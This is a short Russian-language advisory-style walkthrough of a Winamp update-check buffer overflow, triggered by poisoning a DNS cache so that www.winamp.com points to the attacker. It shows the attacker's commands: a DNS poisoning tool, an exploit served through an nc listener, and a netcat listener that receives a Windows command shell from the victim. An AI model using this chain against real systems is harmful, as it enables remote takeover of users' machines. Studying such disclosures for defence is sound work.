Winamp по умолчанию устанавливается с опцией, которая проверяет при запуске наличие последней версии на
http://www.winamp.com и уведомляет пользователя о наличии возможного обновления. Если при этом получен чрезмерно большой ответ, произойдет переполнение буфера. Пример: Nameserver - 192.168.0.1 Attacker - 192.168.1.2 Victim (windows machine) - 192.168.0.2
Хакер портит кэш DNS сервера:
192.168.1.2:
x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2
Жертва ресольвит www.winamp.com к машине атакующего.
192.168.0.2:
C:>nslookup www.winamp.com
Server: z3.names.int
Address: 192.168.0.1
Name: www.winamp.com
Аddress: 192.168.1.2
Атакующий запускает эксплоит:
192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80
На машине жертвы запускается Winamp и пытается найти обновление, происходит переполнение и выполняется код
атакующего:
192.168.1.2:
x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:>
